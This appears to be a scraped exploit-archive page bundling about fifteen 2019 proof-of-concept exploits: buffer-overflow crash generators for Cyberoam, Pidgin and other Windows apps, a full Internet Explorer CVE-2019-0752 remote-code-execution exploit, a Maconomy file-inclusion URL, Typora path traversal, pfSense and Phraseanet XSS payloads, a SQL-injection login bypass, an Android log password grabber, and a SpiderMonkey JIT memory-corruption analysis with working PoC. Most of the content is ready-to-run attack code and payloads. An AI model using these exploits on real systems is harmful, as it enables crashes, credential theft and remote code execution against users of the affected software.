ISHACK AI BOT

#Exploit Title: Cyberoam SSLVPN Client 1.3.1.30 - 'Connect To Server' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-23 #Vendor Homepage: https://www.cyberoam.com #Software Link: https://download.cyberoam.com/solution/optionals/i18n/CrSSL_v1.3.1.30.zip #Tested Version: 1.3.1.30 #Tested on: Windows Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: c_sslvpn_cts.py #2.- Open c_sslvpn_cts.txt and copy content to clipboard #3.- Open Cyberoam SSLVPN Client #4.- Select Server Settings #5.- In "Connect To Server" field paste Clipboard #6.- In "Port" type 80 #7.- Select "OK" #8.- Crashed! cod = "\x41" * 5000 f = open('c_sslvpn_cts.txt', 'w') f.write(cod) f.close()

#Exploit Title: Cyberoam SSLVPN Client 1.3.1.30 - 'HTTP Proxy' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-23 #Vendor Homepage: https://www.cyberoam.com #Software Link: https://download.cyberoam.com/solution/optionals/i18n/CrSSL_v1.3.1.30.zip #Tested Version: 1.3.1.30 #Tested on: Windows Windows 10 Single Language x64 / Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: c_sslvpn_http.py #2.- Open c_sslvpn_http.txt and copy content to clipboard #3.- Open Cyberoam SSLVPN Client #4.- Select Proxy Settings > Enable "Manual Configuration" #5.- In "HTTP Proxy" address field paste Clipboard #6.- In "Port" type 80 #7.- Select "OK" #8.- Crashed! cod = "\x41" * 5000 f = open('c_sslvpn_http.txt', 'w') f.write(cod) f.close()

#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'Fully Qualified Domain Name' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-23 #Vendor Homepage: https://www.cyberoam.com #Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip #Tested Version: 2.1.2.5 #Tested on: Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: ctas_fqdn_2.1.2.5.py #2.- Open ctas_fqdn_2.1.2.5.txt and copy content to clipboard #3.- Open Cyberoam Transparent Authentication Suite #4.- Select General > in Domain Type select "Microsoft Active Directory" #5.- In "Fully Qualified Domain Name" paste Clipboard #6.- Click on "Apply" #7.- Crashed! cod = "\x41" * 1000 f = open('ctas_fqdn_2.1.2.5.txt', 'w') f.write(cod) f.close()

#Exploit Title: Cyberoam Transparent Authentication Suite 2.1.2.5 - 'NetBIOS Name' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-23 #Vendor Homepage: https://www.cyberoam.com #Software Link: https://download.cyberoam.com/solution/optionals/i18n/CTAS%202.1.2.5%20Release.zip #Tested Version: 2.1.2.5 #Tested on: Windows 7 Service Pack 1 x64 #Steps to produce the crash: #1.- Run python code: ctas_nn_2.1.2.5.py #2.- Open ctas_nn_2.1.2.5.txt and copy content to clipboard #3.- Open Cyberoam Transparent Authentication Suite #4.- Select General > in Domain Type select "Microsoft Active Directory" #5.- In "NetBIOS Name" Paste Clipboard #6.- Click on "Apply" #7.- Crashed! cod = "\x41" * 1500 f = open('ctas_nn_2.1.2.5.txt', 'w') f.write(cod) f.close()

# Exploit Title: Microsoft Internet Explorer Windows 10 1809 17763.316 - Scripting Engine Memory Corruption # Date: 03/2019 # Author: Simon Zuckerbraun # Vendor: https://www.microsoft.com/ # Version: February 2019 patch level # Tested on: Windows 10 1809 17763.316 # CVE: CVE-2019-0752 <!-- Full exploit of ZDI-19-359/ZDI-CAN-7757/CVE-2019-0752 --> <!-- Target: Internet Explorer, Windows 10 1809 17763.316 (Feb. 2019 patch level) --> <!-- Vulnerability and original exploit technique by Simon Zuckerbraun (@HexKitchen), Mar. 2019 --> <!-- [email protected] --> <!-- Demonstrates taking an arbitrary write primitive with no info leak, and using it to get --> <!-- all the way to RCE using no shellcode. --> <!-- Note use of CVE-2019-0768 to get VBScript to run on IE/Win10. --> <!-- (h/t: James Forshaw, Google Project Zero) --> <html> <meta http-equiv="x-ua-compatible" content="IE=8"> <meta http-equiv="Expires" content="-1"> <body> <div id="container1" style="overflow:scroll; width: 10px"> <div id="content1" style="width:5000000px"> Content </div> </div> <script language="VBScript.Encode"> Dim ar1(&h3000000) Dim ar2(1000) Dim gremlin addressOfGremlin = &h28281000 Class MyClass Private mValue Public Property Let Value(v) mValue = v End Property Public Default Property Get P P = mValue ' Where to write End Property End Class Sub TriggerWrite(where, val) Dim v1 Set v1 = document.getElementById("container1") v1.scrollLeft = val ' Write this value (Maximum: 0x001767dd) Dim c Set c = new MyClass c.Value = where Set v1.scrollLeft = c End Sub ' Our vulnerability does not immediately give us an unrestricted ' write (though we could manufacture one). For our purposes, the ' following is sufficient. It writes an arbitrary DWORD to an ' arbitrary location, and sets the subsequent 3 bytes to zero. Sub WriteInt32With3ByteZeroTrailer(addr, val) TriggerWrite addr , (val) AND &hff TriggerWrite addr + 1, (val\&h100) AND &hff TriggerWrite addr + 2, (val\&h10000) AND &hff TriggerWrite addr + 3, (val\&h1000000) AND &hff End Sub Sub WriteAsciiStringWith4ByteZeroTrailer(addr, str) For i = 0 To Len(str) - 1 TriggerWrite addr + i, Asc(Mid(str, i + 1, 1)) Next End Sub Function ReadInt32(addr) WriteInt32With3ByteZeroTrailer addressOfGremlin + &h8, addr ReadInt32 = ar1(gremlin) End Function Function LeakAddressOfObject(obj) Set ar1(gremlin + 1) = obj LeakAddressOfObject = ReadInt32(addressOfGremlin + &h18) End Function Sub Exploit() ' Corrupt vt of one array element (the "gremlin") TriggerWrite addressOfGremlin, &h4003 ' VT_BYREF | VT_I4 For i = ((addressOfGremlin - &h20) / &h10) Mod &h100 To UBound(ar1) Step &h100 If Not IsEmpty(ar1(i)) Then gremlin = i Exit For End If Next If IsEmpty(gremlin) Then MsgBox "Could not find gremlin" Exit Sub End If For i = 0 To UBound(ar2) Set ar2(i) = CreateObject("Scripting.Dictionary") Next Set dict = ar2(UBound(ar2) / 2) addressOfDict = LeakAddressOfObject(dict) vtableOfDict = ReadInt32(addressOfDict) scrrun = vtableOfDict - &h11fc kernel32 = ReadInt32(scrrun + &h1f1a4) - &h23c90 winExec = kernel32 + &h5d380 dict.Exists "dummy" ' Make a dispatch call, just to populate pld ' Relocate pld to ensure its address doesn't contain a null byte pld = ReadInt32(addressOfDict + &h3c) fakePld = &h28281020 For i = 0 To 3 - 1 WriteInt32With3ByteZeroTrailer fakePld + 4 * i, ReadInt32(pld + 4 * i) Next fakeVtable = &h28282828 ' ASCII "((((" For i = 0 To 21 If i = 12 Then ' Dictionary.Exists fptr = winExec Else fptr = ReadInt32(vtableOfDict + 4 * i) End If WriteInt32With3ByteZeroTrailer (fakeVtable + 4 * i), fptr Next WriteAsciiStringWith4ByteZeroTrailer addressOfDict, "((((\..\PowerShell.ewe -Command ""<#AAAAAAAAAAAAAAAAAAAAAAAAA" WriteInt32With3ByteZeroTrailer addressOfDict + &h3c, fakePld WriteAsciiStringWith4ByteZeroTrailer addressOfDict + &h40, "#>$a = """"Start-Process cmd `""""""/t:4f /k whoami /user`"""""""""""" ; Invoke-Command -ScriptBlock ([Scriptblock]::Create($a))""" On Error Resume Next dict.Exists "dummy" ' Wheeee!! ' A little cleanup to help prevent crashes after the exploit For i = 1 To 3 WriteInt32With3ByteZeroTrailer addressOfDict + &h48 * i, vtableOfDict WriteInt32With3ByteZeroTrailer addressOfDict + (&h48 * i) + &h14, 2 Next Erase Dict Erase ar2 End Sub Exploit </script> </body> </html>

# Exploit Title: Maconomy Erp local file include # Date: 22/05/2019 # Exploit Author: JameelNabbo # Website: jameelnabbo.com # Vendor Homepage: https://www.deltek.com # Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy # CVE: CVE-2019-12314 POC: POC: http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI Example http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd

# Exploit Title: Fast AVI MPEG Joiner Dos Exploit # Date: 24.5.2019 # Vendor Homepage:http://www.alloksoft.com # Software Link: http://www.alloksoft.com/fast_avimpegjoiner.exe # Exploit Author: Achilles # Tested Version: 1.2.0812 # Tested on: Windows 7 x64 Sp1 # Windows XP x86 Sp3 # 1.- Run python code :Joiner.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open Fast AVI MPEG Joiner.exe # 4.- Paste the content of EVIL.txt into the Field: 'License Name' # 5.- Click 'Register'and you will see a crash. #!/usr/bin/env python buffer = "\x41" * 6000 try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

# -*- coding: utf-8 -*- # Exploit Title: Pidgin 2.13.0 - Denial of Service (PoC) # Date: 24/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: https://pidgin.im/ # Software https://cfhcable.dl.sourceforge.net/project/pidgin/Pidgin/2.13.0/pidgin-2.13.0.exe # Version: 2.13.0 # Tested on: Windows 7, Windows 10 # Proof of Concept: # 1.- Run the python script 'pidgin.py', it will create a new file 'pidgin.txt' # 2.- Open Pidgin # 3.- Go to 'Accounts' > 'Manage Accounts' # 4.- Click 'Add...', paste the content of pidgin.txt into the field 'Username', # into the field 'Password' write anything, e.g. 1234 and click 'Add' # 5.- On the taskbar, click show hidden icons, right click on Pingin and select 'Join Chat...' # 6.- Now click 'Join' and crashed buffer = "\x41" * 1000 f = open ("pidgin.txt", "w") f.write(buffer) f.close()

# Exploit Title: Code execution via path traversal # Date: 17-05-2019 # Exploit Author: Dhiraj Mishra # Vendor Homepage: http://typora.io # Software Link: https://typora.io/download/Typora.dmg # Version: 0.9.9.24.6 # Tested on: macOS Mojave v10.14.4 # CVE: CVE-2019-12137 # References: # https://nvd.nist.gov/vuln/detail/CVE-2019-12137 # https://github.com/typora/typora-issues/issues/2505 Summary: Typora 0.9.9.24.6 on macOS allows directory traversal, for the execution of arbitrary programs, via a file:/// or ../ substring in a shared note via abusing URI schemes. Technical observation: A crafted URI can be used in a note to perform this attack using file:/// has an argument or by traversing to any directory like (../../../../something.app). Since, Typro also has a feature of sharing notes, in such case attacker could leverage this vulnerability and send crafted notes to the victim to perform any further attack. Simple exploit code would be: <body> <a href="file:\\\Applications\Calculator.app" id=inputzero> <img src="someimage.jpeg" alt="inputzero" width="104" height="142"> </a> <script> (function download() { document.getElementById('inputzero').click(); })() </script> </body> And alt would be: ``` [Hello World](file:///../../../../etc/passwd) [Hello World](file:///../../../../something.app) ```

# Exploit Title: pfSense 2.4.4-p3 (ACMEPackage 0.5.7_1) - Stored Cross-Site Scripting # Date: 05.28.2019 # Exploit Author: Chi Tran # Vendor Homepage: https://www.pfsense.org # Version: 2.4.4-p3/0.5.7_1 # Software Link: N/A # Google Dork: N/A # CVE:2019-12347 ################################################################################################################################## Introduction pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. The ACME Package for pfSense interfaces with Let’s Encrypt to handle the certificate generation, validation, and renewal processes. (https://docs.netgate.com/pfsense/en/latest/certificates/acme-package.html) ################################################################################# Proof of Concepts: 1 - Navigate to https://192.168.1.1/acme/acme_accountkeys_edit.php 2 - In the "Name" and "Description" field, input payload: "><svg/onload=alert(1)> 3 - XSS box will then pop-up

#Exploit title: EquityPandit v1.0 - Insecure Logging #Date:27/05/2019 #Exploit Author: ManhNho #Software name: "EquityPandit" #Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit #Version: 1.0 # Category: Android apps #Description: - Sometimes developers keeps sensitive data logged into the developer console. Thus, attacker easy to capture sensitive information like password. - In this application, with adb, attacker can capture password of any users via forgot password function. #Requirement: - Santoku virtual machine - Android virtual machine (installed "EquityPandit" apk file) - Victim user/password: [email protected]/123456 - Exploit code named capture.py in Santoku vm as below: import subprocess import re process_handler = subprocess.Popen(['adb', 'logcat', '-d'], stdout=subprocess.PIPE) dumps = process_handler.stdout.read() password_list = re.findall(r'password\s(.*)', dumps) print 'Captured %i passwords! \nThey are:' %len(password_list) for index, item in enumerate(password_list): print '\t#%i: %s' %(int(index)+1, item) #Reproduce: - Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x) adb connect x.x.x.x - Step 2: From Android machine, open EquityPandit, click forgot password function for acccount "[email protected]" and then click submit - Step 3: From Santoku, execute capture.py - Actual: Password of "[email protected]" will be show in terminal as "123456" #Demo: https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv

# Exploit Title: Petraware pTransformer ADC before 2.1.7.22827 allows SQL Injection via the User ID parameter to the login form. # Date: 28-05-2019 # Exploit Author: Faudhzan Rahman # Website: https://faudhzanrahman.blogspot.com/ # Vendor Homepage: http://www.petraware.com # Version: 2.0 # CVE : CVE-2019-12372 # Tested on: Windows 10 Pro *Description* The login form on pTransformer ADC does not filter dangerous character such as single quote ('). This has cause the application to be vulnerable to SQL Injection. *Proof-of-concept* The vulnerable parameter is User ID. By injecting ' or '1'='1'-- ,it will bypass the login form. *Reference* https://faudhzanrahman.blogspot.com/2019/05/sql-injection-on-login-form.html

# Exploit title: Stored XSS vulnerability in Phraseanet DAM Open Source software # Date: 10/10/2018 # Exploit Author: Krzysztof Szulski # Vendor Homepage: https://www.phraseanet.com # Software Link (also VM): https://www.phraseanet.com/en/download/ # Version affected: 4.0.3 (4.0.4-dev) and below # Version fixed: 4.0.7 # Proof of concept. Phraseanet is an Open Source Digital Asset Management software distributed under GNU GPLV3 license. Registered user (or even guest user, depends of configuration) can upload pictures, videos, pdfs or any other document. A crafted file name for uploaded document leads to stored XSS. In simplest form the name of the file would be: "><svg onload=alert(1)>.jpg or: "><svg onload=alert(document.cookie)>.jpg Please notice that the file name should start from double quotation mark. Once a picture will be uploaded it will pop up an alert window and keep popping up every time anybody will login to the website. Another example of more malicious usage would be this file name: "><svg onload=window.history.back()>.jpg From now on every attempt to login will end up with redirection one step back - to login page. Please be aware that this will not affect Chrome browser and other browsers built on chrome engine which has XSS filter built in.

#Exploit Title: Free SMTP Server - Local Denial of Service Crash (PoC) # Date: February 3, 2009 # Exploit Author: Metin Kandemir (kandemir) # Vendor Homepage: http://www.softstack.com/freesmtp.html # Software Link: https://free-smtp-server.en.uptodown.com/windows/download # Version: 2.5 # Tested on: Windows 7 Service Pack 1 x64 # Software Description : Free SMTP server program to send emails directly from PC. # ================================================================== # The SMTP Server will crash when this code is run on localhost. import socket a=1 buffer = ["A"] while a <= 20000: a = a+1 buffer.append("A"*a) for string in buffer: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect(('127.0.0.1',25)) s.send(string)

IonMonkey can, during a bailout, leak an internal JS_OPTIMIZED_OUT magic value to the running script. This magic value can then be used to achieve memory corruption. # Prerequisites ## Magic Values Spidermonkey represents JavaScript values with the C++ type JS::Value [1], which is a NaN-boxed value that can encode a variety of different types [2] such as doubles, string pointers, integers, or object pointers. Besides the types available in JavaScript, JS::Value can also store special ("magic") [3] values for various internal purposes. For example, JS_ELEMENTS_HOLE is used to represent holes in arrays, and JS_OPTIMIZED_ARGUMENTS represents the `arguments` object during a function call (so that no actual memory allocation is required for it). ## Branch Pruning IonMonkey (Spidermonkey's JIT engine) represents JavaScript code as a control-flow graph (CFG) of MIR (mid-level IR) instructions. When starting to compile a function, IonMonkey first translates the bytecode to the MIR, keeping the same CFG. Afterwards, it tries to remove subtrees in the CFG that appear to not be used in order to save compilation time and potentially improve various optimizations. As an example, consider the following code, and assume further that in all previous executions only the if branch had been taken: if (cond_that_has_always_been_true) { // do something } else { // do something else } In this case, branch pruning would likely decide to discard the else branch entirely and instead replace it with a bailout instruction to bailout to the baseline JIT should the branch ever be taken: if (cond_that_has_always_been_true) { // do something } else { bailout(); // will continue execution in baseline JIT } ## Phi Elimination IonMonkey uses static single assignment (SSA) form for its intermediate representation of the code (MIR). In SSA form, every variable is assigned exactly once. Reassignments of variables on different branches in the CFG are handled with special Phi instructions. Consider the following example: var x; if (c) { x = 1337; } else { x = 1338; } print(x); After translation to SSA form it would look something like this: if (c) { x1 = 1337; } else { x2 = 1338; } x3 = Phi(x1, x2); print(x3); Phi Elimination is an optimization pass that tries to remove Phi instructions that are either redundant or unobservable (which frequently appear as result of SSA conversion and various optimizations). Quoting from the source code [4]: // Eliminates redundant or unobservable phis from the graph. A // redundant phi is something like b = phi(a, a) or b = phi(a, b), // both of which can be replaced with a. An unobservable phi is // one that whose value is never used in the program. Unobservable Phis are then replaced a special value, MagicOptimizedOut [5]. In case of a bailout from the JIT, such an optimized-out value will be materialized as a JS_OPTIMIZED_OUT [6] JS magic value. This should not be observable by script since the compiler was able to prove that the variable is never used. Spidermonkey can, however, not simply leave the slot for an optimized-out variable uninitialized as e.g. the garbage collector expects a valid JS::Value in it. Phi elimination can lead to problems in combination with branch pruning. Consider the following example: var only_used_in_else_branch = ...; if (cond_that_has_always_been_true) { // do something, but don't use only_used_in_else_branch } else { // do something else and use only_used_in_else_branch } Here again, branch pruning might decide to remove the else branch, in which case no use of the variable remains. As such, it would be replaced by a magic JS constant (JS_OPTIMIZED_OUT) in the JIT. Later, if the else branch was actually taken, the JIT code would perform a bailout and try to restore the variable. However, as it has been removed, it would now (incorrectly) restore it as JS_OPTIMIZED_OUT magic and continue using it in the baseline JIT, where it could potentially be observed by the executing script. To avoid this, branch pruning marks SSA variables that are used in removed blocks as "useRemoved" [7], in which case the variables will not be optimized out [8]. # Bug description While fuzzing Spidermonkey, I encountered the following sample which crashes Spidermonkey built from the current release branch: function poc() { const x = "asdf"; for (let v7 = 0; v7 < 2; v7++) { function v8() { let v13 = 0; do { v13++; } while (v13 < 1200000); } const v15 = v8(); for (let v25 = 0; v25 < 100000; v25++) { if (x) { } else { const v26 = {get:v8}; for (let v30 = 0; v30 < 1000; v30++) { } } } } } poc(); It appears what is happening here is roughly the following: At the beginning of JIT compilation (somewhere in one of the inner loops), IonMonkey produces the following simplified CFG (annotated with the different SSA variables for x): +-------+ | 0 +-----+ | Entry | | +-------+ | x1 = "asdf" v +-----------+ | 1 | +--------------->| Loop Head | | +--+--------+ | | x2 = Phi(x1, x5) | +--------+ | v | +-----------+ +------------+ | | 3 | | 2... | | | OSR Entry | | Inlined v8 | | +-+---------+ +----------+-+ | | x3 = osrval('x') | | +---------+ +----------+ | v v | +-------------+ | | 4 | | | Merge | | +-----------+-+ | x4 = Phi(x3, x2) | | v | +-------------+ | | 5... | +-----------+ Inner Loop | +-------------+ x5 = Phi(x4, ..); use(x5); Since the function is already executing in the baseline JIT, the JIT code compiled by IonMonkey will likely be entered via OSR at block 3 in the middle of the outer loop. Next, branch pruning runs. It inspects the hit count of the bytecode (and performs some more heuristics), and decides that block 2 (or really the exit from the loop in v8) should be pruned and replaced with a bailout to the baseline JIT. The CFG then looks something like this: +-------+ | 0 +-----+ | Entry | | +-------+ | x1 = "asdf" v +-----------+ | 1 | +--------------->| Loop Head | | +--+--------+ | | x2 = Phi(x1, x5) | +--------+ | v | +-----------+ +------------+ | | 3 | | 2... | | | OSR Entry | | Inlined v8 | | +-+---------+ +------------+ | | x3 = osrval(1) | +---------+ !! branch pruned !! | v | +-------------+ | | 4 | | | Merge | | +-----------+-+ | x4 = Phi(x3) | | v | +-------------+ | | 5... | +-----------+ Inner Loop | +-------------+ x5 = Phi(x4, ..); use(x5); Since there was no use of x2 in the removed code, x2 is not marked as "use removed". However, when removing the branch 2 -> 4, IonMonkey removed x2 as input to the Phi for x4. This seems logical since x2 can now definitely not flow into x4 since there is no longer a path between block 1 and block 4. However, this removal of a use without setting the "use removed" flag leads to problems later on, in particular during Phi Elimination, which changes the code to the following: +-------+ | 0 +-----+ | Entry | | +-------+ | x1 = "asdf" v +-----------+ | 1 | +--------------->| Loop Head | | +--+--------+ | | x2 = OPTIMIZED_OUT | +--------+ | v | +-----------+ +------------+ | | 3 | | 2... | | | OSR Entry | | Inlined v8 | | +-+---------+ +------------+ | | x3 = osrval(1) | +---------+ !! branch pruned !! | v | +-------------+ | | 4 | | | Merge | | +-----------+-+ | x4 = Phi(x3) | | v | +-------------+ | | 5... | +-----------+ Inner Loop | +-------------+ x5 = Phi(x4, ..); use(x5); Here, Phi Elimination decided that x2 is an unobservable Phi as it is not used anywhere. As such, it replaces it with a MagicOptimizedOut value. However, when block 2 is executed in the JITed code, it will perform a bailout and restore x as JS_OPTIMIZED_OUT magic value. This is incorrect as the interpreter/baseline JIT will use x once it reaches the inner loop. There, x (now the optimized out magic) is used for a ToBoolean conversion, which crashes (in a non exploitable way) when reaching this code: JS_PUBLIC_API bool js::ToBooleanSlow(HandleValue v) { ...; MOZ_ASSERT(v.isObject()); return !EmulatesUndefined(&v.toObject()); // toObject will return an invalid pointer for a magic value } A similar scenario is described in FlagPhiInputsAsHavingRemovedUses [9], which is apparently supposed to prevent this from happening by marking x2 as useRemoved during branch pruning. However, in this case, FlagPhiInputsAsHavingRemovedUses fails to mark x2 as useRemoved as it concludes that x4 is also unused: basically, FlagPhiInputsAsHavingRemovedUses invokes DepthFirstSearchUse [10] to figure out whether some Phi is used by performing a depth-first search over all uses. If it finds a non-Phi use, it returns true. In block 5 above (which are really multiple blocks), x4 is used by another Phi, x5, which is then used by a "real" instruction. DepthFirstSearchUse now visits x5 and puts it into the worklist. It then eventually finds x4 and: * finds x5 as use, but as x5 is already in the worklist it skips it [11] * finds no other uses, and thus (incorrectly?) marks x4 as unused [12] As such, x2 is later on not marked as useRemove since its only use (x4) appears to be unused anyways. # Exploitation It is possible get a reference to the magic JS_OPTIMIZED_OUT value by changing the body of the inner for loop to something like this: for (let v25 = 0; v25 < 100000; v25++) { // Should never be taken, but will be after triggering the bug (because both v3 and v1 // will be a JS_OPTIMIZED_OUT magic value). if (v3 === v1) { let magic = v3; console.log("Magic is happening!"); // do something with magic return; } if (v1) { } else { const v26 = {get:v8}; for (let v30 = 0; v30 < 1000; v30++) { } } } Afterwards, the magic value will be stored in a local variable and can be freely used. What remains now is a way to use the magic value to cause further misbehaviour in the engine. Spidermonkey uses different JSMagic values in various places. These places commonly check for the existence of some specific magic value by calling `.isMagic(expectedMagicType)` on the value in question. For example, to check for the magic hole element, the code would invoke `elem.isMagic(JS_ELEMENTS_HOLE)`. The implementation of `isMagic` is shown below: bool isMagic(JSWhyMagic why) const { MOZ_ASSERT_IF(isMagic(), s_.payload_.why_ == why); return isMagic(); } Interestingly, this way of implementing it makes it possible to supply a different magic value than the expected one while still causing this function to return true, thus making the caller believe that it has the right magic value. As such, the JS_OPTIMIZED_OUT magic value can, in many cases, be used as any other magic value in the code. One interesting use of magic values is JS_OPTIMIZED_ARGUMENTS, representing the `arguments` object. The idea is that e.g. function foo() { print(arguments[0]); } Gets compiled to bytecode such as: push JS_OPTIMIZED_ARGUMENTS LoadElem 0 call print The special handling for the magic value is then performed here: static bool DoGetElemFallback(JSContext* cx, BaselineFrame* frame, ICGetElem_Fallback* stub, HandleValue lhs, HandleValue rhs, MutableHandleValue res) { // ... bool isOptimizedArgs = false; if (lhs.isMagic(JS_OPTIMIZED_ARGUMENTS)) { // Handle optimized arguments[i] access. if (!GetElemOptimizedArguments(cx, frame, &lhsCopy, rhs, res, &isOptimizedArgs)) { return false; } // ... Which eventually ends up in: inline Value& InterpreterFrame::unaliasedActual( unsigned i, MaybeCheckAliasing checkAliasing) { MOZ_ASSERT(i < numActualArgs()); MOZ_ASSERT_IF(checkAliasing, !script()->argsObjAliasesFormals()); MOZ_ASSERT_IF(checkAliasing && i < numFormalArgs(), !script()->formalIsAliased(i)); return argv()[i]; // really is just argv_[i]; } An InterpreterFrame [13] is an object representing the invocation context of a JavaScript function. Basically, there are two types of InterpreterFrames: CallFrames [14], which are used for regular function calls and thus has nactul_ (the number of arguments) and argv_ (a pointer to the argument values) initialized, and ExecuteFrame [15], which are e.g. used for eval()ed code. Interestingly, ExecuteFrames leave nactual_ and argv_ uninitialized, which is normally fine as code would never access these fields in an ExecuteFrame. However, by having a reference to a magic value, it now becomes possible to trick the engine into believing that whatever frame is currently active is a CallFrame and thus has a valid argv_ pointer by loading an element from the magic value (`magic[i]` in JS). Conveniently, InterpreterFrames are allocated by a bump allocator, used solely for the interpreter stack. As such, the allocations are very deterministic and it is easily possible to overlap the uninitialized member with any other data that is stored on the interpreter stack, such as local variables of functions. The following PoC (tested against a local Spidermonkey build and Firefox 65.0.1) demonstrates this. It will first trigger the bug to leak the magic JS_OPTIMIZED_OUT value. Afterwards, it puts a controlled value (0x414141414141 in binary) on the interpreter stack (in fill_stack), then uses the magic value from inside an eval frame of which the argv_ pointer overlaps with the controlled value. Spidermonkey will then assume that the current frame must be a FunctionFrame and treat the value as an argv_ pointer, thus crashing at 0x414141414141. // This function uses roughly sizeof(InterpreterFrame) + 14 * 8 bytes of interpreter stack memory. function fill_stack() { // Use lot's of stack slots to increase the allocation size of this InterpreterFrame. var v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13; // Will overlap with the argv_ pointer in the InterpreterFrame for the call to eval. var v14 = 3.54484805889626e-310; } // This function uses roughly sizeof(InterpreterFrame) bytes of interpreter stack memory. The inner // call to eval will get its own InterpreterFrame, which leaves the argv_ pointer uninitialized // (since it's an eval frame). However, due to having a magic value here, it is possible to trick // the interpreter into accessing argv_ (because it assumes that the magic value represents an // `arguments` object). The argv_ pointer of the inner frame will then overlap with one of the // variables of the previous function, and is thus fully controllable. function trigger(magic) { eval(`magic[0]`); } // Invoke the two functions above to achieve memory corruption given a magic JS::Value. function hax(magic) { fill_stack(); trigger(magic); } function pwn() { const v1 = "adsf"; const v3 = "not_asdf"; for (let v7 = 0; v7 < 2; v7++) { function v8() { let v13 = 0; do { v13++; } while (v13 < 1200000); // If the previous loop runs long enough, IonMonkey will JIT compile v8 and enter the // JITed code via OSR. This will leave the hitCount for the loop exit in the interpreter // at 0 (because the exit is taken in JITed code). This in turn will lead to IonMonkey // pruning the loop exit when compiling pwn() (with inlined v8), as its heuristics // suggest that the branch is never taken (hitCount == 0 and a few more). This will then // lead to the incorrect removal of Phi nodes, and ultimately the leaking of a // JS_OPTMIZED_OUT magic value to the baseline JIT, where it is observable for the // current script. } const v15 = v8(); for (let v25 = 0; v25 < 100000; v25++) { // Should never be taken, but will be after triggering the bug (because both v3 and v1 // will be a JS_OPTIMIZED_OUT magic value). if (v3 === v1) { let magic = v3; console.log("Magic is happening!"); hax(magic); return; } if (v1) { } else { const v26 = {get:v8}; for (let v30 = 0; v30 < 1000; v30++) { } } } } } pwn(); [1] https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/public/Value.h#L276 [2] https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/public/Value.h#L53 [3] https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/public/Value.h#L191 [4] https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L1382 [5] https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonTypes.h#L447 [6] https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/public/Value.h#L223 [7] https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/MIR.h#L129 [8] https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L1330 [9] https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L146 [10] https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L41 [11] https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L106 [12] https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/jit/IonAnalysis.cpp#L135 [13] https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/vm/Stack.h#L85 [14] https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/vm/Stack-inl.h#L51 [15] https://github.com/mozilla/gecko-dev/blob/cfffcfb4c03737d963945c2025bbbe75beef45c6/js/src/vm/Stack.cpp#L35 Fixed in https://www.mozilla.org/en-US/security/advisories/mfsa2019-08/#CVE-2019-9792 The issue was fixed in two ways: 1. In https://hg.mozilla.org/releases/mozilla-beta/rev/5f4ba71d48892ddfc9e800aec521a46eaae175fd the debug assertion in isMagic was changed into a release assert, preventing the exploitation of leaked JS_MAGIC values as described above. 2. In https://hg.mozilla.org/mozilla-central/rev/044a64c70a3b the DFS in DepthFirstSearchUse was modified to (conservatively) mark Phis in loops as used. A more complex implementation which can correctly determine whether Phis inside loops are actually used remains as a separate bug.

